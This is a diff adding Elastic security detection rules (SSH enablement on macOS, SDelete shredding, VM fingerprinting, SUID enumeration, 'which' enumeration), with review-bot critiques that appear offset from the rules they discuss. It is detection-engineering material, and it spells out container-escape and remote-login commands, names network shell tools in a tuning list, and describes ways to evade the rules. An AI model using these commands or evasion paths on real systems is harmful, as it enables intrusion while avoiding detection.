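Review bot: `process.args : "/dev/sd*"` in the first sequence step only covers SCSI/SATA-style device names, so on the cloud and virtualised hosts where a container escape matters most — root disks exposed as `/dev/nvme*`, `/dev/xvd*`, `/dev/vd*` or `/dev/mapper/*` — `mount /dev/nvme0n1p1 /mnt && chroot /mnt` never matches. Widening the predicate to `process.args : ("/dev/sd*", "/dev/nvme*", "/dev/xvd*", "/dev/vd*", "/dev/mapper/*", "/dev/dm-*")` preserves the intent and closes that gap without affecting the chroot step. The description frames the rule as catching a user *within a container*, but nothing in the query constrains to container context (for instance a populated `container.id`), so it fires identically on bare hosts; that is acceptable but the description should say so rather than imply container scoping. Minor: `containarized` in the description should read `containerized`, and the reference is the Portuguese-language HackTricks mirror (`/v/portugues-ht/`) rather than the canonical English page.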
@@ -0,0 +1,99 @@
+{
+ "attributes": {
+ "author": [
+ "Elastic"
+ ],
+ "description": "Detects use of the systemsetup command to enable remote SSH Login.",
+ "from": "now-9m",
+ "index": [
+ "logs-endpoint.events.*"
+ ],
+ "language": "kuery",
+ "license": "Elastic License v2",
+ "name": "Remote SSH Login Enabled via systemsetup Command",
+ "query": "event.category:process and host.os.type:macos and event.type:(start or process_started) and\n process.name:systemsetup and\n process.args:(\"-setremotelogin\" and on) and\n not process.parent.executable : /usr/local/jamf/bin/jamf\n",
+ "references": [
+ "https://documents.trendmicro.com/assets/pdf/XCSSET_Technical_Brief.pdf",
+ "https://ss64.com/osx/systemsetup.html",
+ "https://support.apple.com/guide/remote-desktop/about-systemsetup-apd95406b8d/mac"
+ ],
+ "related_integrations": [
+ {
+ "package": "endpoint",
+ "version": "^8.2.0"
+ }
+ ],
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "event.category",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.type",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "host.os.type",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.args",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.name",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.parent.executable",
+ "type": "keyword"
+ }
+ ],
+ "risk_score": 47,
+ "rule_id": "5ae4e6f8-d1bf-40fa-96ba-e29645e1e4dc",
+ "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a macOS System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, for MacOS it is recommended to select \"Traditional Endpoints\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/current/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n",
+ "severity": "medium",
+ "tags": [
+ "Domain: Endpoint",
+ "OS: macOS",
+ "Use Case: Threat Detection",
+ "Tactic: Lateral Movement",
+ "Data Source: Elastic Defend"
+ ],
+ "threat": [
+ {
+ "framework": "MITRE ATT&CK",
+ "tactic": {
+ "id": "TA0008",
+ "name": "Lateral Movement",
+ "reference": "https://attack.mitre.org/tactics/TA0008/"
+ },
+ "technique": [
+ {
+ "id": "T1021",
+ "name": "Remote Services",
+ "reference": "https://attack.mitre.org/techniques/T1021/",
+ "subtechnique": [
+ {
+ "id": "T1021.004",
+ "name": "SSH",
+ "reference": "https://attack.mitre.org/techniques/T1021/004/"
+ }
+ ]
+ }
+ ]
+ }
+ ],
+ "timestamp_override": "event.ingested",
+ "type": "query",
+ "version": 106
+ },
+ "id": "5ae4e6f8-d1bf-40fa-96ba-e29645e1e4dc_106",
+ "type": "security-rule"
+}
\ No newline at end of file
diff --git a/packages/security_detection_engine/kibana/security_rule/5aee924b-6ceb-4633-980e-1bde8cdb40c5_108.json b/packages/security_detection_engine/kibana/security_rule/5aee924b-6ceb-4633-980e-1bde8cdb40c5_108.json
new file mode 100644
index 00000000000..dd0278ea40f
--- /dev/null
+++ b/packages/security_detection_engine/kibana/security_rule/5aee924b-6ceb-4633-980e-1bde8cdb40c5_108.json
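Review bot: The exclusion `not process.parent.executable : /usr/local/jamf/bin/jamf` is the intended MDM tuning, but it also means a compromised Jamf tenant, or a malicious policy script pushed through it, can run `systemsetup -setremotelogin on` across the fleet without this rule firing, and the rule ships with no `note` documenting that blind spot. If Elastic Defend populates parent code-signature fields on macOS (to be confirmed against live data), tightening it to `not (process.parent.executable : /usr/local/jamf/bin/jamf and process.parent.code_signature.trusted : true)` at least stops an unsigned binary dropped at that path from inheriting the allowlist. A `note` should also state that enabling SSH through `launchctl load -w /System/Library/LaunchDaemons/ssh.plist` or `launchctl enable system/com.openssh.sshd` is out of scope here and needs a companion rule, so operators do not read this rule as full coverage of the technique.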
@@ -0,0 +1,105 @@
+{
+ "attributes": {
+ "author": [
+ "Elastic"
+ ],
+ "description": "Detects file name patterns generated by the use of Sysinternals SDelete utility to securely delete a file via multiple file overwrite and rename operations.",
+ "from": "now-9m",
+ "index": [
+ "winlogbeat-*",
+ "logs-endpoint.events.*",
+ "logs-windows.sysmon_operational-*",
+ "endgame-*"
+ ],
+ "language": "eql",
+ "license": "Elastic License v2",
+ "name": "Potential Secure File Deletion via SDelete Utility",
+ "note": "## Triage and analysis\n\n### Investigating Potential Secure File Deletion via SDelete Utility\n\nSDelete is a tool primarily used for securely deleting data from storage devices, making it unrecoverable. Microsoft develops it as part of the Sysinternals Suite. Although commonly used to delete data securely, attackers can abuse it to delete forensic indicators and remove files as a post-action to a destructive action such as ransomware or data theft to hinder recovery efforts.\n\nThis rule identifies file name patterns generated by the use of SDelete utility to securely delete a file via multiple file overwrite and rename operations.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Examine the command line and identify the files deleted, their importance and whether they could be the target of antiforensics activity.\n\n### False positive analysis\n\n- This is a dual-use tool, meaning its usage is not inherently malicious. Analysts can dismiss the alert if the administrator is aware of the activity, no other suspicious activity was identified, and there are justifications for the execution.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n - Prioritize cases involving critical servers and users.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- If important data was encrypted, deleted, or modified, activate your data recovery plan.\n - Perform data recovery locally or restore the backups from replicated copies (cloud, other servers, etc.).\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Review the privileges assigned to the user to ensure that the least privilege principle is being followed.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n",
+ "query": "file where host.os.type == \"windows\" and event.type == \"change\" and file.name : \"*AAA.AAA\"\n",
+ "related_integrations": [
+ {
+ "package": "endpoint",
+ "version": "^8.2.0"
+ },
+ {
+ "package": "windows",
+ "version": "^1.5.0"
+ }
+ ],
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "event.type",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "file.name",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "host.os.type",
+ "type": "keyword"
+ }
+ ],
+ "risk_score": 21,
+ "rule_id": "5aee924b-6ceb-4633-980e-1bde8cdb40c5",
+ "severity": "low",
+ "tags": [
+ "Domain: Endpoint",
+ "OS: Windows",
+ "Use Case: Threat Detection",
+ "Tactic: Defense Evasion",
+ "Tactic: Impact",
+ "Data Source: Elastic Endgame",
+ "Resources: Investigation Guide",
+ "Data Source: Elastic Defend",
+ "Data Source: Sysmon"
+ ],
+ "threat": [
+ {
+ "framework": "MITRE ATT&CK",
+ "tactic": {
+ "id": "TA0005",
+ "name": "Defense Evasion",
+ "reference": "https://attack.mitre.org/tactics/TA0005/"
+ },
+ "technique": [
+ {
+ "id": "T1070",
+ "name": "Indicator Removal",
+ "reference": "https://attack.mitre.org/techniques/T1070/",
+ "subtechnique": [
+ {
+ "id": "T1070.004",
+ "name": "File Deletion",
+ "reference": "https://attack.mitre.org/techniques/T1070/004/"
+ }
+ ]
+ }
+ ]
+ },
+ {
+ "framework": "MITRE ATT&CK",
+ "tactic": {
+ "id": "TA0040",
+ "name": "Impact",
+ "reference": "https://attack.mitre.org/tactics/TA0040/"
+ },
+ "technique": [
+ {
+ "id": "T1485",
+ "name": "Data Destruction",
+ "reference": "https://attack.mitre.org/techniques/T1485/"
+ }
+ ]
+ }
+ ],
+ "timestamp_override": "event.ingested",
+ "type": "eql",
+ "version": 108
+ },
+ "id": "5aee924b-6ceb-4633-980e-1bde8cdb40c5_108",
+ "type": "security-rule"
+}
\ No newline at end of file
diff --git a/packages/security_detection_engine/kibana/security_rule/5aee924b-6ceb-4633-980e-1bde8cdb40c5_109.json b/packages/security_detection_engine/kibana/security_rule/5aee924b-6ceb-4633-980e-1bde8cdb40c5_109.json
new file mode 100644
index 00000000000..f597ba942f3
--- /dev/null
+++ b/packages/security_detection_engine/kibana/security_rule/5aee924b-6ceb-4633-980e-1bde8cdb40c5_109.json
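Review bot: The whole detection is the single predicate `file.name : "*AAA.AAA"`, i.e. the literal name SDelete leaves after its final rename pass, so any rebuilt or alternative shredder (a patched SDelete, `cipher /w`, a `shred` port) produces no alert while any legitimate file whose name happens to end in `aaa.aaa` does — the `:` operator is case-insensitive. The investigation guide asks analysts to "Examine the command line and identify the files deleted", yet nothing in the query or `required_fields` ties the file event to the initiating process, so that step silently depends on `process.name`/`process.command_line` being enriched onto the file event by the data source; the note should say so, and list `process.name` under `required_fields` if the guide relies on it. Given the rule already carries `risk_score` 21 / `severity` low, a one-line sentence in the note that this is a low-fidelity rename-pattern indicator meant to be corroborated by process telemetry would set analyst expectations correctly.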
@@ -0,0 +1,105 @@
+{
+ "attributes": {
+ "author": [
+ "Elastic"
+ ],
+ "description": "Detects file name patterns generated by the use of Sysinternals SDelete utility to securely delete a file via multiple file overwrite and rename operations.",
+ "from": "now-9m",
+ "index": [
+ "winlogbeat-*",
+ "logs-endpoint.events.file-*",
+ "logs-windows.sysmon_operational-*",
+ "endgame-*"
+ ],
+ "language": "eql",
+ "license": "Elastic License v2",
+ "name": "Potential Secure File Deletion via SDelete Utility",
+ "note": "## Triage and analysis\n\n### Investigating Potential Secure File Deletion via SDelete Utility\n\nSDelete is a tool primarily used for securely deleting data from storage devices, making it unrecoverable. Microsoft develops it as part of the Sysinternals Suite. Although commonly used to delete data securely, attackers can abuse it to delete forensic indicators and remove files as a post-action to a destructive action such as ransomware or data theft to hinder recovery efforts.\n\nThis rule identifies file name patterns generated by the use of SDelete utility to securely delete a file via multiple file overwrite and rename operations.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Examine the command line and identify the files deleted, their importance and whether they could be the target of antiforensics activity.\n\n### False positive analysis\n\n- This is a dual-use tool, meaning its usage is not inherently malicious. Analysts can dismiss the alert if the administrator is aware of the activity, no other suspicious activity was identified, and there are justifications for the execution.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n - Prioritize cases involving critical servers and users.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- If important data was encrypted, deleted, or modified, activate your data recovery plan.\n - Perform data recovery locally or restore the backups from replicated copies (cloud, other servers, etc.).\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Review the privileges assigned to the user to ensure that the least privilege principle is being followed.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n",
+ "query": "file where host.os.type == \"windows\" and event.type == \"change\" and file.name : \"*AAA.AAA\"\n",
+ "related_integrations": [
+ {
+ "package": "endpoint",
+ "version": "^8.2.0"
+ },
+ {
+ "package": "windows",
+ "version": "^1.5.0"
+ }
+ ],
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "event.type",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "file.name",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "host.os.type",
+ "type": "keyword"
+ }
+ ],
+ "risk_score": 21,
+ "rule_id": "5aee924b-6ceb-4633-980e-1bde8cdb40c5",
+ "severity": "low",
+ "tags": [
+ "Domain: Endpoint",
+ "OS: Windows",
+ "Use Case: Threat Detection",
+ "Tactic: Defense Evasion",
+ "Tactic: Impact",
+ "Data Source: Elastic Endgame",
+ "Resources: Investigation Guide",
+ "Data Source: Elastic Defend",
+ "Data Source: Sysmon"
+ ],
+ "threat": [
+ {
+ "framework": "MITRE ATT&CK",
+ "tactic": {
+ "id": "TA0005",
+ "name": "Defense Evasion",
+ "reference": "https://attack.mitre.org/tactics/TA0005/"
+ },
+ "technique": [
+ {
+ "id": "T1070",
+ "name": "Indicator Removal",
+ "reference": "https://attack.mitre.org/techniques/T1070/",
+ "subtechnique": [
+ {
+ "id": "T1070.004",
+ "name": "File Deletion",
+ "reference": "https://attack.mitre.org/techniques/T1070/004/"
+ }
+ ]
+ }
+ ]
+ },
+ {
+ "framework": "MITRE ATT&CK",
+ "tactic": {
+ "id": "TA0040",
+ "name": "Impact",
+ "reference": "https://attack.mitre.org/tactics/TA0040/"
+ },
+ "technique": [
+ {
+ "id": "T1485",
+ "name": "Data Destruction",
+ "reference": "https://attack.mitre.org/techniques/T1485/"
+ }
+ ]
+ }
+ ],
+ "timestamp_override": "event.ingested",
+ "type": "eql",
+ "version": 109
+ },
+ "id": "5aee924b-6ceb-4633-980e-1bde8cdb40c5_109",
+ "type": "security-rule"
+}
\ No newline at end of file
diff --git a/packages/security_detection_engine/kibana/security_rule/5b03c9fb-9945-4d2f-9568-fd690fee3fba_108.json b/packages/security_detection_engine/kibana/security_rule/5b03c9fb-9945-4d2f-9568-fd690fee3fba_108.json
new file mode 100644
index 00000000000..673302a86b3
--- /dev/null
+++ b/packages/security_detection_engine/kibana/security_rule/5b03c9fb-9945-4d2f-9568-fd690fee3fba_108.json
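Review bot: Narrowing the Elastic Defend index to `logs-endpoint.events.file-*` is the only change from version 108 and is a sensible reduction of scanned data, but the remaining `winlogbeat-*` and `logs-windows.sysmon_operational-*` sources deserve a caveat in the note: Sysmon emits no file-rename event (its file-category events are create, delete and creation-time change), so the rename cascade that `file.name : "*AAA.AAA"` keys on is, as far as I can tell from the Windows integration's event mapping, only observable from Elastic Defend and Elastic Endgame, and hosts instrumented with Sysmon alone are unlikely to ever produce this alert despite the `Data Source: Sysmon` tag. A sentence such as `This rule relies on file rename/modify events; Sysmon does not emit rename events, so effective coverage comes from Elastic Defend and Elastic Endgame data.` in the investigation guide would stop operators assuming coverage they do not have. It may also be worth pointing Sysmon users at its native `FileBlockShredding` (Event ID 28) control, which targets exactly this behaviour, if the integration maps it.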
@@ -0,0 +1,88 @@
+{
+ "attributes": {
+ "author": [
+ "Elastic"
+ ],
+ "description": "An adversary may attempt to get detailed information about the operating system and hardware. This rule identifies common locations used to discover virtual machine hardware by a non-root user. This technique has been used by the Pupy RAT and other malware.",
+ "false_positives": [
+ "Certain tools or automated software may enumerate hardware information. These tools can be exempted via user name or process arguments to eliminate potential noise."
+ ],
+ "from": "now-9m",
+ "index": [
+ "auditbeat-*",
+ "logs-endpoint.events.*",
+ "endgame-*"
+ ],
+ "language": "kuery",
+ "license": "Elastic License v2",
+ "name": "Virtual Machine Fingerprinting",
+ "query": "event.category:process and host.os.type:linux and event.type:(start or process_started) and\n process.args:(\"/sys/class/dmi/id/bios_version\" or\n \"/sys/class/dmi/id/product_name\" or\n \"/sys/class/dmi/id/chassis_vendor\" or\n \"/proc/scsi/scsi\" or\n \"/proc/ide/hd0/model\") and\n not user.name:root\n",
+ "related_integrations": [
+ {
+ "package": "endpoint",
+ "version": "^8.2.0"
+ }
+ ],
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "event.category",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.type",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "host.os.type",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.args",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "user.name",
+ "type": "keyword"
+ }
+ ],
+ "risk_score": 73,
+ "rule_id": "5b03c9fb-9945-4d2f-9568-fd690fee3fba",
+ "setup": "## Setup\n\nThis rule requires data coming in from one of the following integrations:\n- Elastic Defend\n- Auditbeat\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n### Auditbeat Setup\nAuditbeat is a lightweight shipper that you can install on your servers to audit the activities of users and processes on your systems. For example, you can use Auditbeat to collect and centralize audit events from the Linux Audit Framework. You can also use Auditbeat to detect changes to critical files, like binaries and configuration files, and identify potential security policy violations.\n\n#### The following steps should be executed in order to add the Auditbeat on a Linux System:\n- Elastic provides repositories available for APT and YUM-based distributions. Note that we provide binary packages, but no source packages.\n- To install the APT and YUM repositories follow the setup instructions in this [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setup-repositories.html).\n- To run Auditbeat on Docker follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-docker.html).\n- To run Auditbeat on Kubernetes follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-kubernetes.html).\n- For complete \u201cSetup and Run Auditbeat\u201d information refer to the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setting-up-and-running.html).\n",
+ "severity": "high",
+ "tags": [
+ "Domain: Endpoint",
+ "OS: Linux",
+ "Use Case: Threat Detection",
+ "Tactic: Discovery",
+ "Data Source: Elastic Endgame",
+ "Data Source: Elastic Defend"
+ ],
+ "threat": [
+ {
+ "framework": "MITRE ATT&CK",
+ "tactic": {
+ "id": "TA0007",
+ "name": "Discovery",
+ "reference": "https://attack.mitre.org/tactics/TA0007/"
+ },
+ "technique": [
+ {
+ "id": "T1082",
+ "name": "System Information Discovery",
+ "reference": "https://attack.mitre.org/techniques/T1082/"
+ }
+ ]
+ }
+ ],
+ "timestamp_override": "event.ingested",
+ "type": "query",
+ "version": 108
+ },
+ "id": "5b03c9fb-9945-4d2f-9568-fd690fee3fba_108",
+ "type": "security-rule"
+}
\ No newline at end of file
diff --git a/packages/security_detection_engine/kibana/security_rule/5b06a27f-ad72-4499-91db-0c69667bffa5_5.json b/packages/security_detection_engine/kibana/security_rule/5b06a27f-ad72-4499-91db-0c69667bffa5_5.json
new file mode 100644
index 00000000000..53c321ff6bf
--- /dev/null
+++ b/packages/security_detection_engine/kibana/security_rule/5b06a27f-ad72-4499-91db-0c69667bffa5_5.json
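Review bot: `not user.name:root` excludes exactly the case the description motivates — Pupy and similar RATs fingerprint the VM after they already run as root or after escalating — so the rule is blind to the highest-value instance of the behaviour while still carrying `risk_score` 73 / `severity` high. The query also only fires when the DMI path appears as a process argument; reading it via shell redirection (`read v < /sys/class/dmi/id/product_name`), `dmidecode`, `systemd-detect-virt` or `lscpu` leaves no matching `process.args`, and the `false_positives` text does not mention either limitation. Either drop the root exclusion and exclude the known system readers by `process.parent.executable`/`process.name` instead, or lower the score to what the predicate actually proves; in both cases the evasion paths belong in a `note` so analysts calibrate expectations, since the rule ships without one.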
@@ -0,0 +1,129 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This rule monitors for the usage of the \"find\" command in conjunction with SUID and SGUID permission arguments. SUID (Set User ID) and SGID (Set Group ID) are special permissions in Linux that allow a program to execute with the privileges of the file owner or group, respectively, rather than the privileges of the user running the program. In case an attacker is able to enumerate and find a binary that is misconfigured, they might be able to leverage this misconfiguration to escalate privileges by exploiting vulnerabilities or built-in features in the privileged program.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "SUID/SGUID Enumeration Detected", + "query": "process where host.os.type == \"linux\" and event.type == \"start\" and event.action == \"exec\" and \nprocess.name == \"find\" and process.args : \"-perm\" and process.args : (\n \"/6000\", \"-6000\", \"/4000\", \"-4000\", \"/2000\", \"-2000\", \"/u=s\", \"-u=s\", \"/g=s\", \"-g=s\", \"/u=s,g=s\", \"/g=s,u=s\"\n) and not (\n user.Ext.real.id == \"0\" or group.Ext.real.id == \"0\" or process.args_count >= 12 or \n (process.args : \"/usr/bin/pkexec\" and process.args : \"-xdev\" and process.args_count == 7)\n)\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": false, + "name": "group.Ext.real.id", + "type": "unknown" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args_count", + "type": "long" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": false, + 
"name": "user.Ext.real.id", + "type": "unknown" + } + ], + "risk_score": 21, + "rule_id": "5b06a27f-ad72-4499-91db-0c69667bffa5", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Discovery", + "Tactic: Privilege Escalation", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0007", + "name": "Discovery", + "reference": "https://attack.mitre.org/tactics/TA0007/" + }, + "technique": [ + { + "id": "T1083", + "name": "File and Directory Discovery", + "reference": "https://attack.mitre.org/techniques/T1083/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1548", + "name": "Abuse Elevation Control Mechanism", + "reference": "https://attack.mitre.org/techniques/T1548/", + "subtechnique": [ + { + "id": "T1548.001", + "name": "Setuid and Setgid", + "reference": "https://attack.mitre.org/techniques/T1548/001/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 5 + }, + "id": "5b06a27f-ad72-4499-91db-0c69667bffa5_5", + "type": "security-rule" +} \ No newline at end of file 
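Review bot: The third `threat` entry maps tactic TA0003 Persistence with an empty `"technique": []`, while `tags` only carries `Tactic: Discovery` and `Tactic: Privilege Escalation`; either drop the empty Persistence entry or add `"Tactic: Persistence"` to `tags` so the two lists agree. The `name` and `description` spell the permission bit `SGUID`, whereas the sub-technique named in the same hunk is `Setuid and Setgid`, so `"name": "SUID/SGID Enumeration Detected"` would match the standard term. The exclusions on `user.Ext.real.id` and `group.Ext.real.id` rely on non-ECS fields declared `"type": "unknown"`, which presumably only populate from Elastic Defend data; a short `note` field saying so would explain to tuners why the rule stays silent on other sources.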
diff --git a/packages/security_detection_engine/kibana/security_rule/5b18eef4-842c-4b47-970f-f08d24004bde_4.json b/packages/security_detection_engine/kibana/security_rule/5b18eef4-842c-4b47-970f-f08d24004bde_4.json
new file mode 100644
index 00000000000..bce414651e0
--- /dev/null
+++ b/packages/security_detection_engine/kibana/security_rule/5b18eef4-842c-4b47-970f-f08d24004bde_4.json
@@ -0,0 +1,93 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This rule monitors for the usage of the which command with an unusual amount of process arguments. Attackers may leverage the which command to enumerate the system for useful installed utilities that may be used after compromising a system to escalate privileges or move latteraly across the network.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious which Enumeration", + "query": "process where host.os.type == \"linux\" and event.action in (\"exec\", \"exec_event\") and event.type == \"start\" and \nprocess.name == \"which\" and process.args_count >= 10 and not process.parent.name == \"jem\" and \nnot process.args == \"--tty-only\"\n\n/* potential tuning if rule would turn out to be noisy\nand process.args in (\"nmap\", \"nc\", \"ncat\", \"netcat\", nc.traditional\", \"gcc\", \"g++\", \"socat\") and \nprocess.parent.name in (\"bash\", \"dash\", \"ash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\")\n*/ \n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args_count", + "type": "long" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "5b18eef4-842c-4b47-970f-f08d24004bde", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Discovery", + "Data Source: Elastic Defend", + "Data Source: Elastic 
